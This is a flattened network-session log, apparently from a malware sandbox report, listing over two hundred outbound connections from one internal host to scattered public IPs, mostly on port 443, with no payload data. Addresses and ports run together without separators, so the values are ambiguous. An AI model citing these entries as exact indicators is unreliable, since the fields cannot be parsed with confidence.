                                            15685192.168.2.234625045.148.57.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15686192.168.2.233527478.189.222.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15687192.168.2.2340510106.252.18.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15688192.168.2.235506259.4.106.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15689192.168.2.2355454172.42.106.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15690192.168.2.2360942165.91.176.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15691192.168.2.2337870117.180.188.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15692192.168.2.2343832173.42.110.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15693192.168.2.234509081.26.144.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15694192.168.2.234392670.81.121.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15695192.168.2.2356618182.109.219.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15696192.168.2.2337748220.178.56.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15697192.168.2.235983276.144.85.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15698192.168.2.2340256223.158.44.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15699192.168.2.234026838.251.29.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15700192.168.2.236002652.56.82.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15701192.168.2.2332808164.112.172.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15702192.168.2.2334806168.40.232.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15703192.168.2.235129020.240.97.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15704192.168.2.2349756167.37.54.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15705192.168.2.233417460.242.47.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15706192.168.2.233552424.47.85.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15707192.168.2.234805860.180.184.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15708192.168.2.233525223.14.224.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15709192.168.2.2350120194.132.94.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15710192.168.2.2357706129.76.19.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15711192.168.2.2349006212.132.241.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15712192.168.2.235292465.155.48.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15713192.168.2.2342834212.30.25.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15714192.168.2.23508285.174.187.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15715192.168.2.2354576131.209.246.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15716192.168.2.2338318206.55.10.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15717192.168.2.234822269.58.15.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15718192.168.2.235193859.229.181.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15719192.168.2.2336952126.28.177.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15720192.168.2.2349808104.121.156.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15721192.168.2.233804024.67.49.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15722192.168.2.235351692.1.143.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15723192.168.2.234230839.172.2.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15724192.168.2.235909665.247.81.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15725192.168.2.234013245.198.176.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15726192.168.2.2335858159.155.152.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15727192.168.2.2354130217.200.144.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15728192.168.2.2346694200.28.20.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15729192.168.2.2340652120.130.177.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15730192.168.2.2338876154.98.114.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15731192.168.2.2359574178.176.53.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15732192.168.2.234908669.83.60.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15733192.168.2.2336310107.233.242.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15734192.168.2.2333532132.76.73.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15735192.168.2.234162291.112.134.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15736192.168.2.2359522165.95.80.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15737192.168.2.2349388188.114.106.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15738192.168.2.235556682.148.88.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15739192.168.2.2345298118.75.130.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15740192.168.2.2351702109.119.70.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15741192.168.2.2341668183.174.25.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15742192.168.2.2349270158.185.144.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15743192.168.2.233675452.197.205.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15744192.168.2.234226420.70.8.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15745192.168.2.233714836.100.99.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15746192.168.2.2351354118.19.252.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15747192.168.2.233698834.185.248.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15748192.168.2.2333360207.143.176.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15749192.168.2.234628447.107.191.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15750192.168.2.2359110164.205.220.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15751192.168.2.23518705.56.129.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15752192.168.2.236034245.223.35.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15753192.168.2.235319692.230.43.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15754192.168.2.234922441.45.75.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15755192.168.2.235125857.206.166.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15756192.168.2.2354210196.182.159.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15757192.168.2.2338418187.73.126.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15758192.168.2.2335502189.74.57.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15759192.168.2.233306075.77.98.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15760192.168.2.234071644.158.186.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15761192.168.2.2337124207.54.180.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15762192.168.2.235088623.198.35.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15763192.168.2.233683839.255.120.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15764192.168.2.2344748179.143.207.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15765192.168.2.2336634156.220.227.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15766192.168.2.2356818165.221.225.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15767192.168.2.2346238175.196.191.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15768192.168.2.233900695.185.15.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15769192.168.2.2360508136.140.114.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15770192.168.2.234516878.156.44.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15771192.168.2.235961058.100.189.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15772192.168.2.2355276143.180.209.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15773192.168.2.2339042221.234.115.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15774192.168.2.235423039.242.5.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15775192.168.2.2350106217.50.128.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15776192.168.2.2336948207.36.90.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15777192.168.2.235836424.209.226.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15778192.168.2.234056627.248.69.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15779192.168.2.234079225.130.103.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15780192.168.2.233676495.197.164.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15781192.168.2.2351418189.237.114.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15782192.168.2.235500264.177.205.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15783192.168.2.234731818.197.168.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15784192.168.2.233496286.25.188.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15785192.168.2.2333776155.48.18.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15786192.168.2.235711061.152.146.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15787192.168.2.2340102211.225.241.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15788192.168.2.2333530161.74.29.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15789192.168.2.2356326112.105.71.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15790192.168.2.233823613.171.132.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15791192.168.2.2355642164.110.125.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15792192.168.2.2336478129.191.67.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15793192.168.2.235300232.30.113.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15794192.168.2.235262052.3.215.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15795192.168.2.2349876161.108.24.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15796192.168.2.2337446126.155.231.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15797192.168.2.2347284205.143.133.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15798192.168.2.2335164112.152.20.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15799192.168.2.2351972160.202.174.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15800192.168.2.2357936101.98.69.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15801192.168.2.234544259.152.175.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15802192.168.2.2340772195.28.120.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15803192.168.2.234770043.45.220.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15804192.168.2.2343602122.120.123.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15805192.168.2.2348386185.95.122.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15806192.168.2.2353728184.138.22.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15807192.168.2.235217465.24.118.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15808192.168.2.2356654196.54.113.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15809192.168.2.233558665.88.87.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15810192.168.2.234938290.4.36.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15811192.168.2.233396223.21.210.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15812192.168.2.2344412189.112.221.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15813192.168.2.233454814.49.214.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15814192.168.2.2348608206.62.65.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15815192.168.2.2358222118.80.88.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15816192.168.2.2343330188.52.113.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15817192.168.2.2349962192.160.108.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15818192.168.2.233750223.0.160.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15819192.168.2.234140698.114.25.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15820192.168.2.235361425.51.247.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15821192.168.2.236011827.10.111.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15822192.168.2.2356882221.32.22.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15823192.168.2.2334754141.57.76.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15824192.168.2.2356892218.185.116.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15825192.168.2.2345202192.47.141.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15826192.168.2.2345236183.153.163.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15827192.168.2.2357420164.102.207.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15828192.168.2.233910097.15.176.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15829192.168.2.233306027.254.60.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15830192.168.2.2351328157.34.174.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15831192.168.2.2339764211.194.109.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15832192.168.2.2356700220.221.64.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15833192.168.2.2342372144.175.28.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15834192.168.2.2352412178.173.26.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15835192.168.2.234313258.105.10.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15836192.168.2.235543618.62.16.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15837192.168.2.2342600216.177.123.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15838192.168.2.2350716166.63.60.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15839192.168.2.2348398180.242.88.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15840192.168.2.2333342181.125.191.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15841192.168.2.2353850153.81.95.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15842192.168.2.2355210107.211.111.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15843192.168.2.2352164101.239.82.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15844192.168.2.2340796223.32.202.878080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15845192.168.2.2341328192.142.40.2208080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15846192.168.2.2345376104.86.61.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15847192.168.2.2350386222.69.15.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15848192.168.2.233688059.142.150.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15849192.168.2.2353078155.253.106.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15850192.168.2.2348864199.52.96.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15851192.168.2.234745860.211.48.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15852192.168.2.233377047.199.127.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15853192.168.2.2339908105.31.127.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15854192.168.2.2353584189.18.205.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15855192.168.2.2358948138.23.26.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15856192.168.2.2346094141.71.58.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15857192.168.2.2340956184.80.9.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15858192.168.2.236048083.87.70.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15859192.168.2.233750619.80.109.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15860192.168.2.2354274209.33.111.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15861192.168.2.2354968126.92.31.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15862192.168.2.2335362211.111.14.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15863192.168.2.235507038.213.47.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15864192.168.2.233792672.248.85.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15865192.168.2.2358248101.133.44.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15866192.168.2.234634884.190.233.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15867192.168.2.2354240204.167.237.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15868192.168.2.2340328216.84.20.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15869192.168.2.234620019.32.118.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15870192.168.2.236007892.227.83.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15871192.168.2.2342590120.149.53.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15872192.168.2.2336572176.204.72.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15873192.168.2.235035667.62.233.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15874192.168.2.2357220136.87.87.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15875192.168.2.2350848206.191.1.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15876192.168.2.2338612212.81.251.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15877192.168.2.2349494176.159.6.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15878192.168.2.2355864166.0.134.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15879192.168.2.234303069.5.231.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15880192.168.2.235552894.224.106.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15881192.168.2.23424701.38.125.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15882192.168.2.2350072221.9.104.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15883192.168.2.2353830126.198.213.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15884192.168.2.2348176131.111.253.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15885192.168.2.2358566149.50.247.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15886192.168.2.2344386196.86.247.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15887192.168.2.2337816178.68.247.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15888192.168.2.23476828.61.181.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15889192.168.2.233726877.195.58.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15890192.168.2.2350578223.228.75.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15891192.168.2.235950231.120.172.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15892192.168.2.2355980138.182.165.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15893192.168.2.2345502179.120.208.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15894192.168.2.2343860109.107.139.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15895192.168.2.2355342117.145.157.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15896192.168.2.2359156167.130.92.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15897192.168.2.234453895.85.27.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15898192.168.2.2354104157.88.192.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15899192.168.2.235932825.240.238.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15900192.168.2.2338926128.184.237.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15901192.168.2.2352684221.136.144.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15902192.168.2.235476459.67.206.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15903192.168.2.2347766111.10.53.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15904192.168.2.235351017.63.74.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15905192.168.2.2354258179.73.238.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15906192.168.2.2334520176.97.1.98443
                                            TimestampBytes transferredDirectionData


